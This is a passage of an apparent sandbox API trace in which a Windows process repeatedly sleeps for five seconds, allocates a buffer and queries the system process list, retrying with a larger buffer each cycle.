NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.976] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.054] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 